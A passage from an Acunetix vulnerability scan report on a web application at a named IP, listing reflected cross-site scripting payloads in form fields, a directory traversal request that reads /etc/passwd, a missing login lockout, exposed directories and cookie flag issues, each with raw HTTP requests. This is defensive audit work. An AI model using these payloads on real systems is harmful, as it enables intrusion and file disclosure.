<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 379<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=wmnuajmy&amp;lastName=wmnuajmy&amp;password=acUn3t1x&amp;state=NY&amp;zip=%22%20onmouseover%3dprompt%28976053%29%20bad%3d%22</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:02 GMT<br>Content-Length: 14694</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input zip was set to &quot; onmouseover=prompt(992403) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:129px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 379<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">28</td>
</tr>
</table>
<a name="PageN29"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:120px">
<td colspan="19" class="s43">Accept: */*<br> <br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=wmnuajmy&amp;lastName=wmnuajmy&amp;password=acUn3t1x&amp;state=NY&amp;zip=%22%20onmous</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:02 GMT<br>Content-Length: 14694</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/updateUserDetails</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input country was set to 1&lt;ScRiPt &gt;prompt(949542)&lt;/ScRiPt&gt; <br>The input is reflected inside a text element.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:217px">
<td colspan="19" class="s43">POST /yuliana/user/account/updateUserDetails HTTP/1.1<br>Content-Length: 324<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=25800%20Carlos%20Bee%20Boulevard&amp;address2=3137 Laguna Street&amp;city=Hayward&amp;companyName=Acunetix&amp;country=1%3cScRiPt%20%3eprompt%28949542%29%3c%2fScRiPt%3e&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;firstName=fTest&amp;lastName=lTest&amp;state=CA&amp;zip=94542</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7619<br>Date: Sun, 26 Feb 2012 03:17:21 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/updateUserDetails</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input country was set to 1&lt;ScRiPt &gt;prompt(917159)&lt;/ScRiPt&gt; <br>The input is reflected inside a text element.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:217px">
<td colspan="19" class="s43">POST /yuliana/user/account/updateUserDetails HTTP/1.1<br>Content-Length: 324<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=25800%20Carlos%20Bee%20Boulevard&amp;address2=3137 Laguna Street&amp;city=Hayward&amp;companyName=Acunetix&amp;country=1%3cScRiPt%20%3eprompt%28917159%29%3c%2fScRiPt%3e&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;firstName=fTest&amp;lastName=lTest&amp;state=CA&amp;zip=94542</td>
</tr>
<tr style="height:1px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">29</td>
</tr>
</table>
<a name="PageN30"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7647<br>Date: Sun, 26 Feb 2012 03:17:20 GMT</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Directory Traversal</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img23.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">High</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Validation</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Scripting (Directory_Traversal.script)</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:66px">
<td colspan="19" class="s13">This script is possibly vulnerable to directory traversal attacks.<br><br>Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:35px">
<td colspan="19" class="s13">By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Your script should filter metacharacters from user input.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/partners/displayParnerLetter</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13">URL encoded POST input letter was set to /../..//../..//../..//../..//../..//etc/passwd%00 <br>File contents found: <br>root:x:0:0:Super-User:/:/usr/bin/bash:x:1:1::/::x:2:2::/usr/bin:<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:172px">
<td colspan="19" class="s43">POST /yuliana/partners/displayParnerLetter HTTP/1.1<br>Content-Length: 77<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>letter=/../..//../..//../..//../..//../..//etc/passwd%00&amp;SUBMIT=View%20Letter</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:16:54 GMT<br>Content-Length: 13041</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Login page password-guessing attack</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img24.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Low</td>
</tr>
<tr style="height:19px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Validation</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">30</td>
</tr>
</table>
<a name="PageN31"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Reported by module</td><td colspan="13" class="s38">Scripting (Html_Authentication_Audit.script)</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:113px">
<td colspan="19" class="s13">A common threat web developers face is a password-guessing attack known as a brute force attack. A brute-force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until you discover the one correct combination that works. <br><br>This login page doesn't have any protection against password-guessing attacks (brute force attacks). It's recommended to implement some type of account lockout after a defined number of incorrect password attempts. Consult Web references for more information about fixing this problem.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:35px">
<td colspan="19" class="s13">An attacker may attempt to discover a weak password by systematically trying every possible combination of letters, numbers, and symbols until it discovers the one correct combination that works.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">It's recommended to implement some type of account lockout after a defined number of incorrect password attempts.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/validation/j_security_check</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">The scanner tested 10 invalid credentials and no account lockout was detected.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:157px">
<td colspan="19" class="s43">POST /yuliana/user/validation/j_security_check HTTP/1.1<br>Content-Length: 39<br>Content-Type: application/x-www-form-urlencoded<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>j_password=6Cj1ZEKD&amp;j_username=nvlTWcFU</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:98px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Set-Cookie: JSESSIONID=569CD8B432ACD344604336A5F5B5354D; Path=/yuliana<br>Content-Type: text/html<br>Content-Length: 7378<br>Date: Sun, 26 Feb 2012 03:14:19 GMT</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Possible sensitive directories</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img25.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Low</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Validation</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Scripting (Possible_Sensitive_Directories.script)</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:50px">
<td colspan="19" class="s13">A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks for common sensitive resources like backup directories, database dumps, administration pages, temporary directories. Each one of these directories could help an attacker to learn more about his target.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">This directory may expose sensitive information that could help a malicious user to prepare more advanced attacks.</td>
</tr>
<tr style="height:48px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">31</td>
</tr>
</table>
<a name="PageN32"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Restrict access to this directory or remove it from the website.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/email</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">No details are available.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">GET /yuliana/email HTTP/1.1<br>Accept: acunetix/wvs<br>Range: bytes=0-99999<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 302 Moved Temporarily<br>Server: Apache-Coyote/1.1<br>Location: http://134.154.14.153:8080/yuliana/email/<br>Date: Sun, 26 Feb 2012 03:14:20 GMT<br>Content-Length: 0</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/error</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">No details are available.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">GET /yuliana/error HTTP/1.1<br>Accept: acunetix/wvs<br>Range: bytes=0-99999<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 302 Moved Temporarily<br>Server: Apache-Coyote/1.1<br>Location: http://134.154.14.153:8080/yuliana/error/<br>Date: Sun, 26 Feb 2012 03:14:24 GMT<br>Content-Length: 0</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/test</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">No details are available.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">GET /yuliana/test HTTP/1.1<br>Accept: acunetix/wvs<br>Range: bytes=0-99999<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:48px">
<td colspan="19" class="s43">HTTP/1.1 302 Moved Temporarily<br>Server: Apache-Coyote/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">32</td>
</tr>
</table>
<a name="PageN33"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:46px">
<td colspan="19" class="s43">Location: http://134.154.14.153:8080/yuliana/test/<br>Date: Sun, 26 Feb 2012 03:14:30 GMT</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Session Cookie without HttpOnly flag set</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img26.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Low</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Crawler</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:50px">
<td colspan="19" class="s13">This session cookie doesn't have the HTTPOnly flag set. When a cookie is set with the HTTPOnly flag, it instructs the browser that the cookie can only be accessed by the server and not by client-side scripts. This is an important security protection for session cookies.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">None</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">If possible, you should set the HTTPOnly flag for this cookie.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">Cookie name: &quot;JSESSIONID&quot; <br>Cookie domain: &quot;134.154.14.153&quot;</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43">GET / HTTP/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">Cookie name: &quot;JSESSIONID&quot; <br>Cookie domain: &quot;134.154.14.153&quot;</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43">GET / HTTP/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Session Cookie without Secure flag set</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img27.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Low</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Crawler</td>
</tr>
<tr style="height:11px">
